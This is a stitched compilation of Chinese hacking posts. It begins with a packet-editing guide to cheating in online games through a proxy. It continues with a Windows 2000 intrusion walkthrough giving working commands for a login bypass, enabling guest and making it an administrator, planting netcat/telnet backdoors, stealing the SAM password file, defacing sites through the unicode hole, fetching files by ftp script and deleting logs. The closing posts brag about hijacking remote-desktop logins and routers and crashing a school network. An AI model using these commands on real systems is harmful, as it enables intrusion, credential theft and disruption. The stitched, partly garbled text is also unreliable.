- 只有FILTER启用钮在OFF的状态下，才可以勾选Filter前的方框来编辑修改。
- 当您想编辑某个Filter，只要双击该Filter的名字即可。
NORMAL MODE：
范例：
当您在 Street Fighter Online ﹝快打旋风线上版?#123;游戏中，您使用了两次火球而且击中了对方，这时您会撷取到以下的封包：
SEND-> 0000 08 14 21 06 01 04
SEND-> 0000 02 09 87 00 67 FF A4 AA 11 22 00 00 00 00
SEND-> 0000 03 84 11 09 11 09
SEND-> 0000 0A 09 C1 10 00 00 FF 52 44
SEND-> 0000 0A 09 C1 10 00 00 66 52 44

您的第一个火球让对方减了16滴﹝16 = 10h?#123;的生命值，
而您观察到第4跟第5个封包的位置4有10h的值出现，应该就是这里了。
您观察10h前的0A 09 C1在两个封包中都没改变，可见得这3个数值是发出火球的关键。
因此您将0A 09 C1
10填在搜寻列﹝SEARCH?#123;，然后在修改列﹝MODIFY?#123;的位置4填上FF。如此一来，当您再度发出火球时，FF会取代之前的10，也就是攻击力为255的火球了！

ADVANCED MODE：
范例：

当您在一个游戏中，您不想要用真实姓名，您想用修改过的假名传送给对方。在您使用TRACE后，您会发现有些封包里面有您的名字出现。假设您的名字是Shadow，换算成16进位则是﹝53
68 61 64 6F 77?#123;；而您打算用moon﹝6D 6F 6F 6E 20 20?#123;来取代他。
1) SEND-> 0000 08 14 21 06 01 04
2) SEND-> 0000 01 06 99 53 68 61 64 6F 77 00 01 05
3) SEND-> 0000 03 84 11 09 11 09
4) SEND-> 0000 0A 09 C1 10 00 53 68 61 64 6F 77 00 11
5) SEND-> 0000 0A 09 C1 10 00 00 66 52 44

但是您仔细看，您的名字在每个封包中并不是出现在相同的位置上

- 在第2个封包里，名字是出现在第4个位置上
- 在第4个封包里，名字是出现在第6个位置上

在这种情况下，您就需要使用ADVANCED MODE
- 您在搜寻列﹝SEARCH?#123;填上：53 68 61 64 6F 77 ﹝请务必从位置1开始填?#123;
- 您想要从原来名字Shadow的第一个字母开始置换新名字，因此您要选择从数值被发现的位置开始替代连续数值﹝from the position of the
chain found?#123;。
- 现在，在修改列﹝MODIFY?#123;000的位置填上：6D 6F 6F 6E 20 20
﹝此为相对应位置，也就是从原来搜寻栏的+001位置开始递换?#123;
- 如果您想从封包的第一个位置就修改数值，请选择﹝from the beginning of the packet?#123;

了解一点TCP/IP协议常识的人都知道，互联网是将信息数据打包之后再传送出去的。每个数据包分为头部信息和数据信息两部分。头部信息包括数据包的发送地址和到达地址等。数据信息包括我们在游戏中相关操作的各项信息。那么在做截获封包的过程之前我们先要知道游戏服务器的IP地址和端口号等各种信息，实际上最简单的是看看我们游戏目录下，是否有一个SERVER.INI的配置文件，这个文件里你可以查看到个游戏服务器的IP地址，比如金庸群侠传就是如此，那么除了这个我们还可以在DOS下使用NETSTAT这个命令，

NETSTAT命令的功能是显示网络连接、路由表和网络接口信息，可以让用户得知目前都有哪些网络连接正在运作。或者你可以使用木马客星等工具来查看网络连接。工具是很多的，看你喜欢用哪一种了。

NETSTAT命令的一般格式为：
NETSTAT [选项]

命令中各选项的含义如下：
-a 显示所有socket，包括正在监听的。
-c 每隔1秒就重新显示一遍，直到用户中断它。
-i 显示所有网络接口的信息。
-n 以网络IP地址代替名称，显示出网络连接情形。
-r 显示核心路由表，格式同"route -e"。
-t 显示TCP协议的连接情况。
-u 显示UDP协议的连接情况。
-v 显示正在进行的工作。
三：怎么来分析我们截获的封包？
首先我们将WPE截获的封包保存为文本文件，然后打开它，这时会看到如下的数据（这里我们以金庸群侠传里PK店小二客户端发送的数据为例来讲解）：

第一个文件：
SEND-> 0000 E6 56 0D 22 7E 6B E4 17 13 13 12 13 12 13 67 1B
SEND-> 0010 17 12 DD 34 12 12 12 12 17 12 0E 12 12 12 9B
SEND-> 0000 E6 56 1E F1 29 06 17 12 3B 0E 17 1A
SEND-> 0000 E6 56 1B C0 68 12 12 12 5A
SEND-> 0000 E6 56 02 C8 13 C9 7E 6B E4 17 10 35 27 13 12 12
SEND-> 0000 E6 56 17 C9 12

第二个文件：
SEND-> 0000 83 33 68 47 1B 0E 81 72 76 76 77 76 77 76 02 7E
SEND-> 0010 72 77 07 1C 77 77 77 77 72 77 72 77 77 77 6D
SEND-> 0000 83 33 7B 94 4C 63 72 77 5E 6B 72 F3
SEND-> 0000 83 33 7E A5 21 77 77 77 3F
SEND-> 0000 83 33 67 AD 76 CF 1B 0E 81 72 75 50 42 76 77 77
SEND-> 0000 83 33 72 AC 77

我们发现两次PK店小二的数据格式一样，但是内容却不相同，我们是PK的同一个NPC，为什么会不同呢？
原来金庸群侠传的封包是经过了加密运算才在网路上传输的，那么我们面临的问题就是如何将密文解密成明文再分析了。

因为一般的数据包加密都是异或运算，所以这里先讲一下什么是异或。
简单的说，异或就是"相同为0，不同为1"（这是针对二进制按位来讲的），举个例子，0001和0010异或，我们按位对比，得到异或结果是0011，计算的方法是：0001的第4位为0，0010的第4位为0，它们相同，则异或结果的第4位按照"相同为0，不同为1"的原则得到0，0001的第3位为0，0010的第3位为0，则异或结果的第3位得到0，0001的第2位为0，0010的第2位为1，则异或结果的第2位得到1，0001的第1位为1，0010的第1位为0，则异或结果的第1位得到1，组合起来就是0011。异或运算今后会遇到很多，大家可以先熟悉熟悉，熟练了对分析很有帮助的。

下面我们继续看看上面的两个文件，按照常理，数据包的数据不会全部都有值的，游戏开发时会预留一些字节空间来便于日后的扩充，也就是说数据包里会存在一些"00"的字节，观察上面的文件，我们会发现文件一里很多"12"，文件二里很多"77"，那么这是不是代表我们说的"00"呢？推理到这里，我们就开始行动吧！

我们把文件一与"12"异或，文件二与"77"异或，当然用手算很费事，我们使用"M2M 1.0 加密封包分析工具"来计算就方便多了。得到下面的结果：

第一个文件：
1 SEND-> 0000 F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09
SEND-> 0010 05 00 CF 26 00 00 00 00 05 00 1C 00 00 00 89
2 SEND-> 0000 F4 44 0C E3 3B 13 05 00 29 1C 05 08
3 SEND-> 0000 F4 44 09 D2 7A 00 00 00 48
4 SEND-> 0000 F4 44 10 DA 01 DB 6C 79 F6 05 02 27 35 01 00 00
5 SEND-> 0000 F4 44 05 DB 00

第二个文件：
1 SEND-> 0000 F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09
SEND-> 0010 05 00 70 6B 00 00 00 00 05 00 05 00 00 00 1A
2 SEND-> 0000 F4 44 0C E3 3B 13 05 00 29 1C 05 84
3 SEND-> 0000 F4 44 09 D2 56 00 00 00 48
4 SEND-> 0000 F4 44 10 DA 01 B8 6C 79 F6 05 02 27 35 01 00 00
5 SEND-> 0000 F4 44 05 DB 00

哈，这一下两个文件大部分都一样啦，说明我们的推理是正确的，上面就是我们需要的明文！

接下来就是搞清楚一些关键的字节所代表的含义，这就需要截获大量的数据来分析。

首先我们会发现每个数据包都是"F4 44"开头，第3个字节是变化的，但是变化很有规律。我们来看看各个包的长度，发现什么没有？对了，第3个字节就是包的长度！
通过截获大量的数据包，我们判断第4个字节代表指令，也就是说客户端告诉服务器进行的是什么操作。例如向服务器请求战斗指令为"30"，战斗中移动指令为"D4"等。
接下来，我们就需要分析一下上面第一个包"F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09 05 00 CF 26
00 00 00 00 05 00 1C 00 00 00
89"，在这个包里包含什么信息呢？应该有通知服务器你PK的哪个NPC吧，我们就先来找找这个店小二的代码在什么地方。
我们再PK一个小喽罗（就是大理客栈外的那个咯）：
SEND-> 0000 F4 44 1F 30 D4 75 F6 05 01 01 00 01 00 01 75 09
SEND-> 0010 05 00 8A 19 00 00 00 00 11 00 02 00 00 00 C0
我们根据常理分析，游戏里的NPC种类虽然不会超过65535（FFFF），但开发时不会把自己限制在字的范围，那样不利于游戏的扩充，所以我们在双字里看看。通过"店小二"和"小喽罗"两个包的对比，我们把目标放在"6C
79 F6 05"和"CF 26 00
00"上。（对比一下很容易的，但你不能太迟钝咯，呵呵）我们再看看后面的包，在后面的包里应该还会出现NPC的代码，比如移动的包，游戏允许观战，服务器必然需要知道NPC的移动坐标，再广播给观战的其他玩家。在后面第4个包"SEND->
0000 F4 44 10 DA 01 DB 6C 79 F6 05 02 27 35 01 00 00"里我们又看到了"6C 79 F6
05"，初步断定店小二的代码就是它了！
（这分析里边包含了很多工作的，大家可以用WPE截下数据来自己分析分析）

第一个包的分析暂时就到这里（里面还有的信息我们暂时不需要完全清楚了）

我们看看第4个包"SEND-> 0000 F4 44 10 DA 01 DB 6C 79 F6 05 02 27 35 01 00
00"，再截获PK黄狗的包，（狗会出来2只哦）看看包的格式：
SEND-> 0000 F4 44 1A DA 02 0B 4B 7D F6 05 02 27 35 01 00 00
SEND-> 0010 EB 03 F8 05 02 27 36 01 00 00

根据上面的分析，黄狗的代码为"4B 7D F6 05"（100040011），不过两只黄狗服务器怎样分辨呢？看看"EB 03 F8
05"（100140011），是上一个代码加上100000，呵呵，这样服务器就可以认出两只黄狗了。我们再通过野外遇敌截获的数据包来证实，果然如此。

那么，这个包的格式应该比较清楚了：第3个字节为包的长度，"DA"为指令，第5个字节为NPC个数，从第7个字节开始的10个字节代表一个NPC的信息，多一个NPC就多10个字节来表示。

大家如果玩过网金，必然知道随机遇敌有时会出现增援，我们就利用游戏这个增援来让每次战斗都会出现增援的NPC吧。

通过在战斗中出现增援截获的数据包，我们会发现服务器端发送了这样一个包：
F4 44 12 E9 EB 03 F8 05 02 00 00 03 00 00 00 00 00 00
第5-第8个字节为增援NPC的代码（这里我们就简单的以黄狗的代码来举例）。
那么，我们就利用单机代理技术来同时欺骗客户端和服务器吧！

好了，呼叫NPC的工作到这里算是完成了一小半，接下来的事情，怎样修改封包和发送封包，我们下节继续讲解吧。
四：怎么冒充"客户端"向"服务器"发我们需要的封包？
这里我们需要使用一个工具，它位于客户端和服务器端之间，它的工作就是进行数据包的接收和转发，这个工具我们称为代理。
如果代理的工作单纯就是接收和转发的话，这就毫无意义了，但是请注意：所有的数据包都要通过它来传输，这里的意义就重大了。我们可以分析接收到的数据包，或者直接转发，或者修改后转发，或者压住不转发，甚至伪造我们需要的封包来发送。

下面我们继续讲怎样来同时欺骗服务器和客户端，也就是修改封包和伪造封包。
通过我们上节的分析，我们已经知道了打多个NPC的封包格式，那么我们就动手吧！

首先我们要查找客户端发送的包，找到战斗的特征，就是请求战斗的第1个包，我们找"F4 44 1F 30"这个特征，这是不会改变的，当然是要解密后来查找哦。
找到后，表示客户端在向服务器请求战斗，我们不动这个包，转发。
继续向下查找，这时需要查找的特征码不太好办，我们先查找"DA"，这是客户端发送NPC信息的数据包的指令，那么可能其他包也有"DA"，没关系，我们看前3个字节有没有"F4
44"就行了。找到后，我们的工作就开始了！

我们确定要打的NPC数量。这个数量不能很大，原因在于网金的封包长度用一个字节表示，那么一个包可以有255个字节，我们上面分析过，增加一个NPC要增加10个字节，所以大家算算就知道，打20个NPC比较合适。

然后我们要把客户端原来的NPC代码分析计算出来，因为增加的NPC代码要加上100000哦。再把我们增加的NPC代码计算出来，并且组合成新的封包，注意代表包长度的字节要修改啊，然后转发到服务器，这一步在编写程序的时候要注意算法，不要造成较大延迟。

上面我们欺骗服务器端完成了，欺骗客户端就简单了，^-^

发送了上面的封包后，我们根据新增NPC代码构造封包马上发给客户端，格式就是"F4 44 12 E9 NPC代码 02 00 00 03 00 00 00 00
00 00",把每个新增的NPC都构造这样一个包，按顺序连在一起发送给客户端，客户端也就被我们骗过了，很简单吧。

以后战斗中其他的事我们就不管了，尽情地开打吧，呵呵。

上面讲的需要一定的编程基础，但是不难，即使你不会编程，相信你继续看下去就会有收获了。
五：怎么用计算机语言去写一个单机代理？
在上一章，我们已经对于代理的原理进行了讲解，大家对于代理已经有了一个初步的认识，现在我教大家如何用计算机语言编写一个自己的代理，我们考虑到简单明了，我们选用VB，因为用VB编写代理只需要很少的代码。

代码如下：

Private Sub form_Load()
DaiLi.LocalPort = "1234"
Server.RemotePort = "1234"
Server.RemoteHost = "211.100.20.26"
DaiLi.Listen
End Sub

Private Sub DaiLi_ConnectionRequest(ByVal requestID As Long)
Server.Connect
Client.Accept requestID
End Sub

Private Sub Client_DataArrival(ByVal bytesTotal As Long)
Dim ClientToServer() As Byte
Client.GetData ClientToServer
Server.SendData ClientToServer
End Sub

Private Sub Server_DataArrival(ByVal bytesTotal As Long)
Dim ServerToClient() As Byte
Server.GetData ServerToClient
Client.SendData ServerToClient
End Sub

form_Load（）这个过程表示在程序启动的时候要做的一些初始化操作。
DaiLi.LocalPort = "1234" 设定监听端口
Server.RemotePort = "1234" 设定象游戏服务器连接的端口（和监听端口是相同的）
Server.RemoteHost = "211.100.20.26" 设定游戏服务器的IP地址
DaiLi.Listen 监听本地的连接请求
这时你只要将游戏的服务器列表的IP改成127.0.0.1，那么游戏的客户端程序就会来连接我们的代理，我们的代理会调用如下的过程：
Private Sub DaiLi_ConnectionRequest(ByVal requestID As Long)
Server.Connect 代理客户端向服务器连接
Client.Accept requestID 接受客户端的连接请求
End Sub

当客户端向服务器发送数据时，就会调用下边的过程
Private Sub Client_DataArrival(ByVal bytesTotal As Long)
Dim ClientToServer() As Byte 变量定义，请求了一个用于存放数据的空间
Client.GetData ClientToServer 客户端的连接接收这些数据
在这里我们可以添加自己的代码，对封包进行修改，然后再发向服务器。

Server.SendData ClientToServer 服务器的连接把这些数据发向服务器
End Sub

当服务器发送数据给客户端时，会调用下边的过程
Private Sub Server_DataArrival(ByVal bytesTotal As Long)
Dim ServerToClient() As Byte 变量定义，请求了一个用于存放数据的空间
Server.GetData ServerToClient 服务器连接接收数据
在这里我们可以添加自己的代码，对封包进行修改，然后再发给客户端。

Client.SendData ServerToClient
End Sub

入侵步骤：

一，获得管理员账号：

　　我们先对一个网段进行扫描，扫描端口设为3389，运行客户端连接管理器，将扫描到的任一地址加入到，设置好客户端连接管理器，然后与服务器连结。几秒钟后，屏幕上显示出WIN2000登录界面（如果发现是英文或繁体中文版，放弃，另换一个地址），用CTRL+SHIFT快速切换输入法，切换至全拼，这时在登录界面左下角将出现输入法状态条（如果没有出现，请耐心等待，因为对方的数据流传输还有一个过程）。用右键点击状态条上的微软徽标，弹出“帮助”（如果发现“帮助”呈灰色，放弃，因为对方很可能发现并已经补上了这个漏洞），打开“帮助”一栏中“操作指南”，在最上面的任务栏点击右键，会弹出一个菜单，打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如，该系统安装在Ｃ盘上，就在空白栏中填入"c:winntsystem32"。然后按“确定”，于是我们就成功地绕过了身份验证，进入了系统的SYSTEM32目录。
　 现在我们要获得一个账号，成为系统的合法用户。在该目录下找到"net.exe"，为"net.exe"创建一个快捷方式，右键点击该快捷方式，在“属性”－;“目标”－;c:winntsystem32 et.exe后面空一格，填入"usergu est /active:yes"点“确定”。这一步骤目的在于用net.exe激活被禁止使用的guest账户，当然也可以利用"user 用户名　密码／add"，创建一个新账号，但容易引起网管怀疑。运行该快捷方式，此时你不会看到运行状态，但guest用户已被激活。然后又修改该快捷方式，填入"userguest 密码"，运行，于是guest便有了密码。最后，再次修改，填入“localgroupadministratorsguest /add，将guest变成系统管理员。

注意事项：

１、在这过程中，如果对方管理员正在使用终端服务管理器，他将看到你所打开的进程id，你的ip和机器名，甚至能够给你发送消息。

２、终端服务器在验证你的身份的时候只留给了你一分钟的时间，在这一分钟内如果你不能完成上述操作，你只能再连结。

３、你所看到的图像与操作会有所延迟，这受网速的影响。

二，创建跳板：

　　再次登录终端用务器，以"guest"身份进入，此时guest已是系统管理员，已具备一切可执行权。打开“控制面板”，进入“网络和拔号连接”，在“本地连接”或“拔号连接”中查看属性，看对方是否选择“Microsoft 网络的文件和打印机共享”，如果没有，就打上勾。对方如果使用的是拔号上网，下次拔号网络共享才会打开。

　　退出对方系统，在本地机命令提示符下，输入netuse \IP AddressIPC$ ["password"] /user:"guset"，通过IPC的远程登陆就成功了。
登陆成功之后先复制一个Telnet的程序上去（小榕流光安装目录下的Tools目录里的Srv.exe,另外，还有nt ml.xex，一会要用），这个程序是在对方上面开一个Telnet服务，端口是99。

　　copy c:hacksrv.exe \***.***.***.***ad min$然后利用定时服务启动它，先了解对方的时间：net time \***.***.***.***
显示：\***.***.***.*** 的当前时间是 2001/1/8 下午 08:55 命令成功完成。然后启动srv.exe:at \***.***.***.*** 09:00 srv.exe　
显示：新加了一项作业，其作业 ID = 0过几分钟后，telnet ***.***.***.*** 99 这里不需要验证身份，直接登录，显示：c:winnt:system32; 我们就成功登陆上去了。然后又在本地打开命令提示符，另开一个窗口，输入：copy c:hack tlm.exe \211.21.193.202admin$
把事先存放在hack目录里的ntlm.exe拷过去。然后又回到刚才的telnet窗口，运行ntlm.exe

C:WINNTsystem32;ntlm

显示：
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:WINNTsystem32;
C:WINNTsystem32;

　　好，现在我们来启动WIN2000本身的telnet，首先终止srv.exe的telnet服务：ne t stop tel net　系统告诉你并没有启动telnet，不理它，继续：net start telnet　这次真的启动了telnet，我们可以在另开的命令提示符窗口telnet到对方的23端口，验证身份，输入我们的guest账号和密码，它就真正成为我们的跳板了。我们可以利用它到其它的主机去。

　　三、扫除脚印：

删除为net.exe 创建的快捷方式，删除winntsystem32logfiles下边的日志文件

补漏方法：

1、打补丁

2、删除输入法帮助文件

3、停止终端服务。

只要你拥有某ip的用户名和密码，那就用ipc$做连接吧！

这里我们假如你得到的用户是hbx，密码是123456。假设对方ip为127.0.0.1

net u-se \\127.0.0.1\ipc$ 123456 /user:hbx

退出的命令是

net u-se \\127.0.0.1\ipc$ /delte

下面的操作你必须登陆后才可以用.登陆的方法就在上面.

----------------------

下面我们讲怎么创建一个用户，由于sa的权限相当于系统的超级用户.

我们加一个heibai的用户密码为lovechina

net user heibai lovechina /add

只要显示命令成功，那么我们可以把他加入administrator组了.

net localgroup admini-strators heibai /add

----------------------

这里是讲映射对方的c盘，当然其他盘也可以，只要存在就行了.我们这里把对方的c盘映射到本地的z盘.

net use z:\\127.0.0.1\c$

----------------------

net start telnet

这样可以打开对方的telnet服务.

----------------------

这里是将guest用户激活，guest是nt的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。

net user guest /active:yes

----------------------

这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！

net usergue st lovechina

net命令果然强大啊！

2:at

一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？

那么需要用at命令，这里假设你已经登陆了那个服务器。

你首先要得到对方的时间，

net time \\127.0.0.1

将会返回一个时间，这里假设时间为12:1，现在需要新建一个作业，其id=1

at \\127.0.0.1 12:3 nc.exe

这里假设了一个木马，名为nc.exe，这个东西要在对方服务器上.

这里介绍一下nc，nc是netcat的简称，为了方便输入，一般会被改名.它是一个telnet服务，端口为99.

等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.

3:telnet

这个命令非常实用，它可以与远方做连接，不过正常下需要密码、用户，不过你给对方种了木马，直接连到这个木马打开的端口.

telnet 127.0.0.1 99

这样就可以连到对方的99端口.那你就可以在对方运行命令了，这个也就是肉鸡.

4:ftp

它可以将你的东西传到对方机子上，你可以去申请个支持ftp上传的空间，国内多的是，如果真的找不到，我http://www.51.net/，不错的.当我们申请完后，它会给用户名，密码，以及ftp服务器.

在上传前需要登陆先，这里我们假设ftp服务http://www.51.net/，用户名是hucjs，密码是654321

ftp http://www.51.net/

他会要求输入用户，成功后会要求输入密码.

----------------------

下面先说上传，假设你需上传的文件是index.htm，它位于c:\下，传到对方d:\

get c:\index.htm d:\

假设你要把对方c盘下的index.htm，下到你的机子的d盘下

put c:\index.htm d:\

5:copy

下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好ipc$连接才有效。

这里我们把本地c盘下的index.htm复制到127.0.0.1的c盘下

copy index.htm \\127.0.0.1\c$\index.htm

----------------------

如果你要复制到d盘下把c改为d，就行了！

copy index.htm \\127.0.0.1\d$\index.htm

----------------------

如果你要把他复制到winnt目录里

就要把输入

copy index.htm \\127.0.0.1\ad min$\index.htm

ad min$是winnt

----------------------

要把对方的文件复制过来，顺便告诉大家nt的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名

下面就把127.0.0.1的数据库复制到本地c盘下

copy \\127.0.0.1\ad min$\repair\sam._ c:\

----------------------

6：set

如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的80端口要开，不然你黑给谁看。这时需要用set命令！

下面是我得到的结果！我来分析它，只是找主页在那而已。

computername=pentiumii
comspec=d:\winnt\system32\cmd.exe
cｏｎtent_length=0
gateway_interface=cgi/1.1
http_accept=*/*
http_accept_language=zh-cn
http_cｏｎnectiｏｎ=keep-alive
http_host=当前登陆者的ip，这里本来是显示我的ip，被我删除了
http_accept_encoding=gzip， deflate
http_user_agent=mozilla/4.0 (compatible; msie 5.0; windows 98; digext)
number_of_processors=1
os2libpath=d:\winnt\system32\os2\dll;
os=windows_nt
path=d:\winnt\system32;d:\winnt
pathext=.com;.exe;.bat;.cmd
path_translated=e:\vlroot主页放在的地址，只要你看到path_translated=的后面就是主页的存放地址。这里是e:\vlroot
processor_architecture=x86
processor_identifier=x86 family 6 model 3 stepping 3， genuineintel
processor_level=6
processor_revisiｏｎ=0303
prompt=$p$g
query_string=/c+set
remote_addr=xx.xx.xx.xx
remote_host=xx.xx.xx.xx
request_method=get
_name=/s/..%2f../winnt/system32/cmd.exe
server_name=xx.xx.xx.xx
server_port=80
server_port_secure=0
server_protocol=http/1.1
server_software=microsoft-iis/3.0对方使用iis/3.0
systemdrive=d:
systemroot=d:\winnt
tz=gmt-9
userprofile=d:\winnt\profiles\default user
windir=d:\winnt

粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧啊，不过只能用这个方法才能100%的找到主页的名称，当你dir这个目录时，一定会看到很多文件，你可以把所有文件在浏览器这样输入xx.xx.xx.xx/文件名，这样只要看到和xx.xx.xx.xx看到的也面一模一样，那么这就是主页的名称了。

7：nbtstat

如果你扫到一部nt的机子，他的136到139其中一个端口开了的话，就要用这个命令得到用户了。顺便告诉大家这是netbios，得到用户名后就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力破解吧！

现在网上很多nt的机子都开了这些端口的，你可以练习下，我们来分析得到的结果。

命令是

nbtstat -a xx.xx.xx.xx

-a一定要大写哦。

下面是得到的结果。

netbios remote machine name table

name type status
---------------------------------------------
registered registered registered registered registered registered registered reg
istered registered registered registered
mac address = 00-e0-29-14-35-ba
pentiumii <00> unique
pentiumii <20> unique
orahotown <00> group
orahotown <1c> group
orahotown <1b> unique
pentiumii <03> unique
inet~services <1c> group
is~pentiumii...<00> unique
orahotown <1e> group
orahotown <1d> unique
..__msbrowse__.<01> group

粉红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是不是看到了一窜数字，只要这窜数字是<03>的话，那他前面的就是用户。

这里的用户是pentiumii。

8：shutdown

关了对方的nt服务器的命令

shutdown \\ip地址 t:20

20秒后将nt自动关闭，三思后才能运行这个命令，这样对对方造很大的损失，要做个有良心的入侵者呀。

9：dir

这个命令没什么好讲，但是却非常重要，他是查看一目录里的所有文件、文件夹。

你可以本地试下。

10：echo

著名的漏洞unicode，这个命令可以简单的黑一下有这个漏洞的主机。

我们假设我们要把“南京大屠杀铁证如山，任何日本人不得抵赖！”写入index.htm，有2种方法，大家看看有什么区别。

echo 南京大屠杀铁证如山，任何日本人不得抵赖！>index.htm

echo 南京大屠杀铁证如山，任何日本人不得抵赖！>>index.htm

第一个的意思是覆盖index.htm原有的内容，把“南京大屠杀铁证如山，任何日本人不得抵赖！”写进index.htm。

第二个的意思是把“南京大屠杀铁证如山，任何日本人不得抵赖！”加到index.htm里面。

“>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。

大家可以本地试下。

可能你会问，这样简单黑下有什么好玩的，其实他可以用来下载主页到对方的目录里。

1、首先，我们需要申请一个**的主页空间。

2、用echo在可写目录下建立如下内容的txt文件：（以chinren服务器为例。）
open upload.chinaren.com（你的ftp服务器，申请时你的空间提供商会给你的）
cnhack（你申请时的用户名）
test（你申请时的密码）
get index.htm c:\inetpub\wwwroot\index.htm（这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm）
bye（退出ftp对话，相当在98下的dos，用exit退出dos）

具体的做法：
输入 echo open upload.chinaren.com> c:\cnhack.txt
输入 echo cnhack >> c:\cnhack.txt
输入 echo 39abs >> c:\cnhack.txt
输入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最后输入 ftp -s:c:\cnhack.txt （利用ftp的-s参数，执行文件里的内容。）

等命令完成时，文件已经下载到你指定的文件里了。

注意：取得文件后，请删除cnhack.txt。（如果不删除，很容易会给别人看到你的密码。）

记得要 del c:\cnhack.txt

11:attrib

这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不行。倒！不过有这个命令就别怕了。

attrib -r index.htm

这个命令是把index.htm的只读属性去掉。

如果把“-”改为“+”则是把这个文件的属性设置为只读

----------------------

attrib +r index.htm

这个命令是把index.htm的属性设置为只读。

12:del

当你看到这个标题可别倒下啊！现在要离开127.0.0.1了，要删除日志，当然要删除日志啦！想被捉吗。呵呵。

nt的日志有这些

del c:\winnt\system32\logfiles\*.*
del c:\winnt\ssytem32\cｏｎfig\*.evt
del c:\winnt\system32\dtclog\*.*
del c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt
del c:\winnt\*.log

只要删除这些就可以了。有些系统nt安装在d盘或其他盘，就要把c改成其他盘。

包夜啊!过两天就可以回家了舒服啊!

没事干只好找找乐趣了,.

先拿出SuperScan哈哈熟悉的画面一看就舒服!在里面的开始和结束端口里输入3389

然后随便在QQ里输入个网段,然后点扫描.....................

一顿狂扫只后嘿嘿还真不少开3389的端口

接着大开咱么的论坛主页里的http://www.nshacker.com/tsweb/

把那写开了3389端口的机器添进去

然后点连接嘿嘿,基本都可以连上的

然后在用户名里输入:administrator

要是运气好的话就可以连进去了

嘿嘿,,(可是管理员权限哦)下面要怎么处置你的肉鸡就看你个人的了!

嘿嘿

我只说这么多了啊!@

有什么不懂的就直接问吧

我会直接回复的!@

还有一点要是输入administrator

连不上的话,就换别的IP,或者试试我上次发的输入法漏洞

总会有成功'|!!

嘿嘿！

到网吧看了下 还真发现个漏洞 那就是路由的

我先说过程！

上www.hao123.com然后找到本机IP然后在IE里输入本机IP！

就看到了 网吧路由的登陆窗口了！

而且密码是自动保存的！

哈哈 ！先在想怎么搞就怎么搞了！

我现在已经把两个网吧的机器都不能上网了！

呵呵！

我现在还不能确定那个操作系统是不是2000的

无意之间扫描主机的时候看到个9000端口接着后面是9001,9002

然后我就在地址里输入http://.....:9001/

回车然后就看到了一个学校网站的收费系统!下面有继续和取消按钮!

我选择继续但是不能跳转! 然后我在地址栏里输入http://.....:9001/15646546546

后面的数字随便 接着回车

没想到的是这样就造成了服务器拒绝服务!

导致我们学校整个网络掉线!现在想想我都心寒~

后来我到网站上去查了一下9000端口是什么端口!到现在也没结果!

望有高手指点!

这两天学校到处查 还好我早有准备了!

郁闷啊!